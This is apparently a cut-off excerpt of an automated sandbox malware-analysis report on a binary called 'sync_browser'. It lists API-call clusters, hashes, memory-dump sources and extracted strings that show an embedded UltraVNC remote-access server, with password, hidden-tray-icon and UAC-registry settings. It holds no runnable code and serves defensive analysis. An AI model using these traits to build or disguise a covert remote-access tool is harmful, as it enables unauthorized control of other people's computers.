                                                                    • API ID: closesocketsetsockoptshutdownsocket
                                                                    • String ID:
                                                                    • API String ID: 3513852771-0
                                                                    • Opcode ID: 7d480c3a304c4e2f7ccf6cbbfd7f0a840315250e84bbd90c940829d90bbae2b2
                                                                    • Instruction ID: 4e8a5c365beb649add8c18b2f76f0da532835f076ab9cde6118d2e74ec4bb095
                                                                    • Opcode Fuzzy Hash: 7d480c3a304c4e2f7ccf6cbbfd7f0a840315250e84bbd90c940829d90bbae2b2
                                                                    • Instruction Fuzzy Hash: 04F0C2B6B2C243C7EB10BF24D811BB5B352AF40704F540A34DA29863E8DB7DF1858A20
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: setsockopt
                                                                    • String ID:
                                                                    • API String ID: 3981526788-0
                                                                    • Opcode ID: 6674a668f832169722ee7df8d3b9e7f845b9a455c109241ca5fb51d15d315839
                                                                    • Instruction ID: 3abba659f30e9baacb81263a92b8eb555fcd689e3ee2c9fe466115f4c865f762
                                                                    • Opcode Fuzzy Hash: 6674a668f832169722ee7df8d3b9e7f845b9a455c109241ca5fb51d15d315839
                                                                    • Instruction Fuzzy Hash: C6F09675A1818293E721AF70E4042B5F351FF85715F540A32DAAD8ABE8CBBCD19A8B10
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CountTickselect
                                                                    • String ID:
                                                                    • API String ID: 2475007269-0
                                                                    • Opcode ID: 84556e81f7513f2c210acb167795192905406201bcbf957d422c0e9d6dbf8d4c
                                                                    • Instruction ID: e9200ef71255958d8446d57aefa20be84354250dde9ed83c0c3f3a67f1f02bcc
                                                                    • Opcode Fuzzy Hash: 84556e81f7513f2c210acb167795192905406201bcbf957d422c0e9d6dbf8d4c
                                                                    • Instruction Fuzzy Hash: E631CE36B08641C6EB04AF21E5941ADB762EB88B84F49843ACF094B79DDE38E4458760
                                                                    APIs
                                                                    • Sleep.KERNEL32(?,?,?,00007FF7400C37F7,?,?,?,00007FF7400BFFD1,?,?,?,?,00007FF7400B8C19), ref: 00007FF7400C3331
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Sleep_errno
                                                                    • String ID:
                                                                    • API String ID: 1068366078-0
                                                                    • Opcode ID: e0fad309830d1d7079ffb5554beb775af7228a8f16d0edcc9117263fd617f576
                                                                    • Instruction ID: 170572fbc21df7c06b752e9d234302febee656cf58485f898f3984986e7b1946
                                                                    • Opcode Fuzzy Hash: e0fad309830d1d7079ffb5554beb775af7228a8f16d0edcc9117263fd617f576
                                                                    • Instruction Fuzzy Hash: 19014F22A2CA81C5EA58BB17984006DF6A5EB88BD0B991131DE5D07BA5CF38F991CB00
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: PrivateProfile$String$Write$Desktop$Threadwsprintf$FileModuleName$CloseCurrentErrorInputLastMessageOpen_errno_invalid_parameter_noinfo
                                                                    • String ID: $AllowEditClients$AllowLoopback$AllowProperties$AllowShutdown$AuthHosts$AuthRequired$AutoPortSelect$Avilog$BlankInputsOnly$BlankMonitorEnabled$ConnectPriority$DSMPlugin$DSMPluginConfig$DebugLevel$DebugMode$DefaultScale$DisableTrayIcon$EnableDriver$EnableHook$EnableJapInput$EnableVirtual$FTUserImpersonation$FileTransferEnabled$HTTPConnect$HTTPPortNumber$IdleTimeout$InputsEnabled$LocalInputsDisabled$LockSetting$LoopbackOnly$MSLogonRequired$MaxCpu$NewMSLogon$OnlyPollConsole$OnlyPollOnEvent$Permission denied:Uncheck [_] Protect my computer... in run as dialog or use user with write permission.$PollForeground$PollFullScreen$PollUnderCursor$PortNumber$QueryAccept$QueryIfNoLogon$QuerySetting$QueryTimeout$RemoveAero$RemoveWallpaper$SingleWindow$SingleWindowName$SocketConnect$TurboMode$UltraVNC$UseDSMPlugin$UseRegistry$XDMCPConnect$accept_reject_mesg$admin$admin_auth$clearconsole$group1$group2$group3$kickrdp$locdom1$locdom2$locdom3$passwd$passwd2$path$poll$primary$secondary
                                                                    • API String ID: 634683900-3478490838
                                                                    • Opcode ID: 2effa7899f974a3009ccd12de8866d22f8568e5a4afa6748285aa8aa378eceda
                                                                    • Instruction ID: 1dc2c79d0a2d232b9ba0d1e44135993381d828cc414b8a164caa09b8c9797cce
                                                                    • Opcode Fuzzy Hash: 2effa7899f974a3009ccd12de8866d22f8568e5a4afa6748285aa8aa378eceda
                                                                    • Instruction Fuzzy Hash: 7FE29F61A0CA8FE5EB10BF64E8509E8A321FB54788FC05032D55D57A78DE7CF64AC7A0
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: PrivateProfile$String$Write$Desktopwsprintf$Thread$CloseCurrentErrorInputLastMessageOpen_callnewh_itowmallocxtoa
                                                                    • String ID: $AllowEditClients$AllowLoopback$AllowProperties$AllowShutdown$AuthHosts$AuthRequired$AutoPortSelect$Avilog$BlankInputsOnly$BlankMonitorEnabled$ConnectPriority$DSMPlugin$DebugLevel$DebugMode$DefaultScale$DisableTrayIcon$EnableDriver$EnableHook$EnableJapInput$EnableVirtual$FTUserImpersonation$FileTransferEnabled$FileTransferTimeout$HTTPConnect$HTTPPortNumber$IdleTimeout$InputsEnabled$LocalInputsDisabled$LockSetting$LoopbackOnly$MSLogonRequired$MaxCpu$NewMSLogon$OnlyPollConsole$OnlyPollOnEvent$PollForeground$PollFullScreen$PollUnderCursor$PortNumber$QueryAccept$QueryIfNoLogon$QuerySetting$QueryTimeout$RemoveAero$RemoveWallpaper$SingleWindow$SingleWindowName$SocketConnect$TurboMode$UltraVNC$UseDSMPlugin$UseRegistry$XDMCPConnect$accept_reject_mesg$admin$admin_auth$clearconsole$group1$group2$group3$kickrdp$locdom1$locdom2$locdom3$passwd$passwd2$path$poll$primary$secondary
                                                                    • API String ID: 341937111-959611688
                                                                    • Opcode ID: 7e73647ecd3fa51fa072c6accf7da39f2f963580055068ff331c9971e3f9d7f8
                                                                    • Instruction ID: a5ae2c9d6d3beaa7c2c58961246c7aa89914d231bf6720f5496b12ffd7131add
                                                                    • Opcode Fuzzy Hash: 7e73647ecd3fa51fa072c6accf7da39f2f963580055068ff331c9971e3f9d7f8
                                                                    • Instruction Fuzzy Hash: D7C2E765A0CA4BE1EA00BB65F8508A4A360FF45798FC05432D95E6777CEE7CF249C7A0
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: DesktopOpen$Close$EventThread$HandleProcess$FileModuleNameUser$CreateCriticalCurrentErrorExecuteInformationInitializeInputLastObjectQuerySectionShellSleepTokenValueVersionWindow
                                                                    • String ID: -softwarecadhelper$Ctrl-alt-del require service, no permission$Ctrl-alt-del require service, no permission$EnableLUA$Global\SessionEventUltraCad$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System$UAC is Disable, make registry changes to allow cad$UltraVNC Warning$Warning$Winsta0\Default$cad.exe$open$vistahook.cpp : !GetUserObjectInformation $vistahook.cpp : OpenInputdesktop Error $vistahook.cpp : OpenInputdesktop OK$vistahook.cpp : SelectHDESK to %s (%x) from %x$vistahook.cpp : SelectHDESK:!SetThreadDesktop
                                                                    • API String ID: 1732492099-311746058
                                                                    • Opcode ID: 364b0ab4c0a733f657dae5b09393cd9c81dc3f4ffc649c11128cba260e889681
                                                                    • Instruction ID: b0b8f5723447af8f4f9a94e0026f11ca1c66edc0d64c21f4d3690b142aee3259
                                                                    • Opcode Fuzzy Hash: 364b0ab4c0a733f657dae5b09393cd9c81dc3f4ffc649c11128cba260e889681
                                                                    • Instruction Fuzzy Hash: A2F13971A0CB42C5EB24BB21A8442A9B3A5FF85754F844236DA6D57BB8EF3DF504C720
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Window$Item$Move$Long$Text$DialogForegroundMessageRectSend_snprintf$InfoInvalidateLoadScrollShowString
                                                                    • String ID: Chat with <%s> - UltraVNC$MS Sans Serif
                                                                    • API String ID: 3122538718-446500584
                                                                    • Opcode ID: 36d5dedeaafecd704d5ccace325cb0965bf20f8b169c0f54af0df3c2fc8c3945
                                                                    • Instruction ID: 00e60424de5c2b6fcb3c358a783a9195607095e3609e31d84fec4fc2004f5e8e
                                                                    • Opcode Fuzzy Hash: 36d5dedeaafecd704d5ccace325cb0965bf20f8b169c0f54af0df3c2fc8c3945
                                                                    • Instruction Fuzzy Hash: 69F16F76A0C642C6EB64BB26E404369A360FF89B94F844131DE5E0BBB8DF3DF5458760
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CapsCompatibleCreateDeviceEnumErrorLastLibrary$AddressBitmapBitsDisplayFreeLoadProcSettingsWindows
                                                                    • String ID: DISPLAY$EnumDisplayDevicesA$USER32$WinVNC$mv video hook driver2$vncDesktop : memory device doesn't support GetDIBitsWinVNC cannot be used with this graphics device driver$vncDesktop : root device doesn't support BitBltWinVNC cannot be used with this graphic device driver$vncdesktop.cpp : Failed m_rootdc $vncdesktop.cpp : No driver used $vncdesktop.cpp : bitmap dimensions are %d x %d$vncdesktop.cpp : created memory bitmap$vncdesktop.cpp : failed to DeleteDC hrootdc$vncdesktop.cpp : failed to create compatibleDC(%d)$vncdesktop.cpp : failed to create memory bitmap(%d)$vncdesktop.cpp : got bitmap format$vncdesktop.cpp : unable to get display colour info$vncdesktop.cpp : unable to get display format
                                                                    • API String ID: 3851920378-1343955350
                                                                    • Opcode ID: 64e6ac3a7bdcde4c20c39546ebbbec1b22000b0516b3881d6d9525ff59da856e
                                                                    • Instruction ID: e1b4b97772c7becb68eced7a0814c5cd9248b5fd87864f708770b698a182381c
                                                                    • Opcode Fuzzy Hash: 64e6ac3a7bdcde4c20c39546ebbbec1b22000b0516b3881d6d9525ff59da856e
                                                                    • Instruction Fuzzy Hash: AD022A72A0C686C5EB14FF24E4406AAA7A1FF85B48F84443ADA0D5B7ACDF38E505D770
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseDesktop$CreateThread$DisplaySettings$ChangeLibraryValuewprintf$AddressCurrentEnumFreeInputLoadOpenProc
                                                                    • String ID: Attach.ToDesktop$DEVICE0$DevNum:%dName:%sString:%sID:%sKey:%s$EnumDisplayDevicesA$No '%s' found.$SYSTEM$SYSTEM\CurrentControlSet\Hardware Profiles\Current$SYSTEM\CurrentControlSet\Hardware Profiles\Current\System\CurrentControlSet\Services\mv2$USER32$\DEVICE$mv video hook driver2$mv2
                                                                    • API String ID: 4207610217-3713657650
                                                                    • Opcode ID: cd3cd2c9535241abd372aab497dfb4bd752fa0a5a9763d12b3f41f1bb9d769e3
                                                                    • Instruction ID: c17c2e20d2a9a4bf04edd3098fa978671e63e9f093daebbe3c21561b3d957b44
                                                                    • Opcode Fuzzy Hash: cd3cd2c9535241abd372aab497dfb4bd752fa0a5a9763d12b3f41f1bb9d769e3
                                                                    • Instruction Fuzzy Hash: 7BC16361A1CA87C5EB60BB11A8506B9B7A4FF84744FC04035DA5E57BACEF3DE205C760
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Delete$Object$Palette$ErrorLast$Select$CreateEntriesSystem$ColorCompatibleRealizeTable
                                                                    • String ID: vncdesktop.cpp : framebuffer has %u palette entries$vncdesktop.cpp : initialised palette OK$vncdesktop.cpp : no palette data for truecolour display$vncdesktop.cpp : unable to allocate logical palette$vncdesktop.cpp : unable to create HPALETTE$vncdesktop.cpp : unable to create temporary DC$vncdesktop.cpp : unable to get system palette entries$vncdesktop.cpp : unable to restore temporary DC bitmap$vncdesktop.cpp : unable to select DIB section into temporary DC$vncdesktop.cpp : unable to select() HPALETTE$vncdesktop.cpp : unable to set DIB section palette$vncdesktop.cpp : warning - failed to RealizePalette
                                                                    • API String ID: 463275814-2693335352
                                                                    • Opcode ID: aa26c122d741df029fa551308a4514e6f6df226472759b8381794094a4369389
                                                                    • Instruction ID: afc94b82acd1d8ce586c107edc208cc473d9635f84f48d9e707b000427ee39cb
                                                                    • Opcode Fuzzy Hash: aa26c122d741df029fa551308a4514e6f6df226472759b8381794094a4369389
                                                                    • Instruction Fuzzy Hash: CBA18E65A0DA87C1FA15FB25A5143B9A3A1AF88B48FC44435C94E477B9DE3CF10AC770
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Desktop$Thread$CloseDisplayLibrarySettings$ChangeCreateFreewprintf$AddressCurrentEnumInputLoadOpenProcValue
                                                                    • String ID: Attach.ToDesktop$DEVICE0$DevNum:%dName:%sString:%sID:%sKey:%s$EnumDisplayDevicesA$No '%s' found.$SYSTEM\CurrentControlSet\Hardware Profiles\Current\System\CurrentControlSet\Services\mv2$USER32$\DEVICE$mv video hook driver2$mv2
                                                                    • API String ID: 27940619-3388178877
                                                                    • Opcode ID: 0339ce360284387b53255601b05480dca21fa52ca98469070f8d84e277019744
                                                                    • Instruction ID: 838c2a80867a7738352d5560ccd58152a970c7b124241e94ede5f34a94e75d8d
                                                                    • Opcode Fuzzy Hash: 0339ce360284387b53255601b05480dca21fa52ca98469070f8d84e277019744
                                                                    • Instruction Fuzzy Hash: CAC17F22A0C682D5EB21FF25A8442A9B7A1FF44794F944135DA4E4B7ACEF3DF505C720
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
